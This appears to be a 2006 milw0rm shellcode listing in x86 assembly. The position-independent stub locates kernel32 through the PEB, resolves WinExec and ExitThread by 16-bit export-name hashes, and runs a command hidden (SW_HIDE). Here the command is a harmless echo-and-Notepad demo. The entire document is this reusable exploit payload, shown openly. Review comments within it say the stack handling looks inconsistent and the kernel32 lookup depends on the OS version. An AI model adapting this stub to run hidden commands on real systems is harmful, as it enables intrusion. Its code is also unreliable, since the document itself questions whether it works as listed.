
win32 WinExec Command Parameter 104+ bytes


Windows API code for WinExec with ExitThread

Code
;
; relocatable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386                                        ; 32-bit x86 instruction set
.model flat,stdcall                         ; flat 32-bit model; the two APIs called are stdcall

ROL_CONSTANT equ 5                          ; rotate amount shared by the build-time hash (hashapi)
                                            ; and the runtime hash loop (hash_api) — both must agree

;-----------------------------------------------------------------------
; mrol iNum,iBits - assembler-time rotate-left of a 32-bit value.
; Expands (exitm) to an expression so it can be used on the right-hand
; side of '=' assignments (see hashapi); nothing is emitted.
; NOTE(review): equivalence with the runtime 'rol edx,ROL_CONSTANT'
; depends on the assembler evaluating this expression as 32-bit;
; confirm for the ML version in use.
;-----------------------------------------------------------------------
mrol macro iNum:req,iBits:req
   exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm

;-----------------------------------------------------------------------
; mror iNum,iBits - assembler-time rotate-right, mirror of mrol.
; Not referenced anywhere in this listing; kept for symmetry.
;-----------------------------------------------------------------------
mror macro iNum:req,iBits:req
   exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm

;-----------------------------------------------------------------------
; hashapi <Name> - emits the 16-bit name hash the stub searches for.
; Algorithm (must stay in sync with hash_api in .code):
;   h = 0; for each char c of Name: h = rol32(h + c, ROL_CONSTANT)
;   then one extra rol - the runtime loop also folds in the terminating
;   NUL (add 0, rol) before it stops.
; Only the low word is stored ('and 0ffffh') because the runtime compares
; dx alone; a 16-bit hash can collide with another export name.
; The caller's angle brackets keep the name as one literal argument;
; '&x' substitutes each forc character into a character constant.
;-----------------------------------------------------------------------
hashapi macro szApi
   local dwApi

   dwApi = 0                                ; running hash

   forc x,szApi
      dwApi = dwApi + '&x'                  ; add the character's code
      dwApi = mrol(dwApi,ROL_CONSTANT)
   endm
   dwApi = mrol(dwApi,ROL_CONSTANT)         ; extra rotate = runtime NUL step
   dw (dwApi and 0ffffh)                    ; low 16 bits only
endm

.code

   assume fs:nothing                        ; permit fs:[..] overrides (TEB/PEB access below)

;-----------------------------------------------------------------------
; Position-independent stub: resolves two kernel32 exports by 16-bit
; name hash (see hashapi) and calls WinExec(cmd_string, SW_HIDE) then
; ExitThread(0).  Layout is code, then the hash table (api_hashes), then
; cmd_string; the stub locates its own data through the return address
; pushed by 'call setup_parameters'.
; Register roles: ebp = api_hashes during setup, later the export
; AddressOfNameOrdinals table; ebx = module base, then resolved API;
; edi = AddressOfNames; esi = scan pointer; ecx = counter / name index;
; edx = running hash.
; The in-place patch of the string terminator is why the link line above
; marks .text writable (a write to an executable section at runtime).
;-----------------------------------------------------------------------
code_start:
   jmp load_data                            ; call/pop trick to get the address of api_hashes
setup_parameters:
   pop ebp                                  ; ebp = api_hashes (return address of the call)
   xor ecx,ecx
   push ecx                                 ; ExitThread() exitcode
   push ecx                                 ; SW_HIDE
   mov cl,(cmd_end-api_hashes)              ; limit of 255 bytes per command
   inc byte ptr[ebp+ecx]                    ; 0ffh -> 0: NUL-terminate cmd_string in place
   lea eax,[ebp+(cmd_string-api_hashes)]
   push eax                                 ; WinExec command string
get_k32_base:
   mov cl,30h
   mov eax,fs:[ecx]                         ; fs:[30h] = PEB
   mov eax,[eax+0ch]                        ; PEB->Ldr
   mov esi,[eax+1ch]                        ; Ldr->InInitializationOrderModuleList.Flink
   lodsd                                    ; eax = second entry in that list
   mov ebx,[eax+08h]                        ; its DllBase
                                            ; NOTE(review): assumes the second init-order module is
                                            ; kernel32 - OS-version dependent, confirm on the target
get_api_loop:
   mov eax,[ebx+3ch]                        ; e_lfanew
   mov eax,[ebx+eax+78h]                    ; export directory RVA (DataDirectory[0])
   lea esi,[ebx+eax+1ch]                    ; &ExportDir.AddressOfFunctions
   mov cl,3
load_rva:
   lodsd                                    ; AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals RVAs
   add eax,ebx                              ; RVA -> VA
   push eax
   loop load_rva                            ; ecx = 0 afterwards
   pop ebp                                  ; ebp = AddressOfNameOrdinals
   pop edi                                  ; edi = AddressOfNames; AddressOfFunctions stays on the stack
load_api:
   mov esi,[edi+4*ecx]                      ; RVA of name[ecx]
   add esi,ebx
   xor eax,eax
   cdq                                      ; edx = 0 (hash accumulator)
hash_api:
   lodsb
   add edx,eax
   rol edx,ROL_CONSTANT                     ; same step as the hashapi macro
   dec eax                                  ; al was 0 -> eax negative -> stop (NUL is hashed too)
   jns hash_api
   inc ecx
   mov eax,[esp+4]                          ; pointer to the current 16-bit target hash
                                            ; NOTE(review): as listed, nothing places that pointer
                                            ; below AddressOfFunctions after the three pushes above;
                                            ; the stack bookkeeping looks inconsistent - confirm
                                            ; against the assembled blob
   cmp dx,word ptr[eax]                     ; low 16 bits only (collision-prone)
   jne load_api
   pop eax                                  ; eax = AddressOfFunctions
   movzx edx,word ptr[ebp+2*ecx-2]          ; ordinal of name[ecx-1]
   add ebx,[eax+4*edx]                      ; ebx = resolved API address
   pop esi                                  ; esi = current hash pointer
   call ebx                                 ; WinExec on the first pass, ExitThread on the second
   lodsw                                    ; esi += 2: advance to the next hash
   jmp get_k32_base
load_data:
   call setup_parameters                    ; pushes the address of api_hashes
api_hashes:
   hashapi <WinExec>                        ; 16-bit hashes, consumed in order
   hashapi <ExitThread>
code_end:

cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh   ; 0ffh placeholder terminator, patched to 0 at runtime
cmd_end equ $-1                             ; address of the terminator byte

end code_start

; milw0rm.com [2006-01-24]
